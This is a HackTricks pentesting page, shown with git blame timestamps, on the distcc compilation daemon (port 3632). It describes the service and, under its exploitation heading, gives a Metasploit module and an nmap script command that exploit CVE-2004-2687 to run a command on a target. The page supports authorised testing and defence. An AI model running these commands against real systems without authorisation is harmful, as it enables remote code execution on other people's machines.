hacktricks/network-services-pentesting/3632-pentesting-distcc.md

65 lines
3.3 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2024-01-05 22:36:48 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-01-05 22:36:48 +00:00
Other ways to support HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-05 22:36:48 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2022-05-01 12:49:36 +00:00
# Basic Information
2024-02-08 21:36:35 +00:00
**Distcc** is a tool that enhances the **compilation process** by utilizing the **idle processing power** of other computers in the network. When **distcc** is set up on a machine, this machine is capable of distributing its **compilation tasks** to another system. This recipient system must be running the **distccd daemon** and must have a **compatible compiler** installed to process the sent code.
2021-11-30 16:46:07 +00:00
**Default port:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
2022-05-01 12:49:36 +00:00
# Exploitation
Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"
```
2022-05-01 12:49:36 +00:00
# Shodan
2020-10-05 10:16:52 +00:00
_I don't think shodan detects this service._
2022-05-01 12:49:36 +00:00
# Resources
2021-11-30 16:46:07 +00:00
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Post created by **Álex B (@r1p)**
2022-04-28 16:01:33 +00:00
<details>
2024-01-05 22:36:48 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-01-05 22:36:48 +00:00
Other ways to support HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-05 22:36:48 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>